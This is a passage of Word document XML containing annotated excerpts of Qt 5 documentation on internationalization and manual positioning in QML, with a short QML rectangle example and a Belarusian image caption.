          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-text.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-text.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-text.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-text.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png"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"http://doc.qt.io/qt-5/images/qml-uses-text.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1032" type="#_x0000_t75" alt="" style="width:5in;height:237.3pt">
            <v:imagedata r:id="rId505" r:href="rId506"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Паказана, як можна выкарыстоўваць мову разметкі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="675" w:name="internationalization-and-scalability"/>
      <w:bookmarkStart w:id="676" w:name="_Toc483000674"/>
      <w:bookmarkStart w:id="677" w:name="_Toc483003691"/>
      <w:bookmarkStart w:id="678" w:name="_Toc483604026"/>
      <w:bookmarkStart w:id="679" w:name="_Toc483605246"/>
      <w:bookmarkEnd w:id="675"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internationalization and Scalability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="676"/>
      <w:bookmarkEnd w:id="677"/>
      <w:bookmarkEnd w:id="678"/>
      <w:bookmarkEnd w:id="679"/>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When dealing with texts, applications must take into account various topics such as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>device's orientation</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>language settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following pages go into detail about these various topics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId507" w:history="1">
        <w:r w:rsidR="00305129" w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Right-to-left User Interfaces</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId508" w:history="1">
        <w:r w:rsidR="00305129" w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Internationalization and Localization with Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId509" w:history="1">
        <w:r w:rsidR="00305129" w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Scalability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00305129" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId510" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00305129">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-layouts.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="680" w:name="_Toc483000675"/>
      <w:bookmarkStart w:id="681" w:name="_Toc483003692"/>
      <w:bookmarkStart w:id="682" w:name="_Toc483604027"/>
      <w:bookmarkStart w:id="683" w:name="_Toc483605247"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case - Positioners and Layouts In QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="680"/>
      <w:bookmarkEnd w:id="681"/>
      <w:bookmarkEnd w:id="682"/>
      <w:bookmarkEnd w:id="683"/>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to position items in QML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Below is a brief overview. For more details, see</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId511" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts In Qt Quick - Positioning</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="684" w:name="manual-positioning"/>
      <w:bookmarkStart w:id="685" w:name="_Toc483000676"/>
      <w:bookmarkStart w:id="686" w:name="_Toc483003693"/>
      <w:bookmarkStart w:id="687" w:name="_Toc483604028"/>
      <w:bookmarkStart w:id="688" w:name="_Toc483605248"/>
      <w:bookmarkEnd w:id="684"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manual Positioning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="685"/>
      <w:bookmarkEnd w:id="686"/>
      <w:bookmarkEnd w:id="687"/>
      <w:bookmarkEnd w:id="688"/>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Items can be placed at specific x,y coordinates on the screen by setting their </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x,y properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This will setup their position </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative to the top left corner of their parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, according to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId512" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>visual coordinate system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Combined with using</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId513" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>bindings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instead of constant valudes for these properties, relative positioning is also easily accomplished by setting the x and y coordinates to the appropriate bindings.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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100</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height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100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Rectangle</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Manually positioned at 20,20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x</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20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y</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20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width</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80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height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80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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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rPr>
      </w:pP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rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
